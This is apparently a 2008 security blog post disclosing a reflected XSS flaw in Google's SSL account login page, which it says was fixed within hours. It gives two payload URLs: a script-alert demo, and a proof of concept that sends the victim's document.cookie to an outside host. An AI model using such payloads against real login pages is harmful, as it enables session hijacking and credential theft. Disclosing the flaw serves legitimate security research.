Google accounts SSL login page suffers from highly critical XSS
Nov 13, 2008 | Category: Google Vulns
In this case, the fact that SSL is being used on the login page, does not necessarily mean that the users’ login information is secured. UPDATE: this was fixed a few hours after publishing it.
Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.
Mirror:
http://www.xssed.com/mirror/54247/
XSS:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone
Redirection and document.cookie PoC:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e’”><SCRIPT>location.href+%3D+’http%3A%2F%2Fwww.xssed.com/?’%2Bdocument.cookie<%2FSCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone
Mirror of similar old Google XSS (now fixed):
http://www.xssed.com/mirror/25472/
Security researcher “Xylitol” is credited with the discovery of this critical bug.
It is only a matter of minutes before we see it fixed by Google.
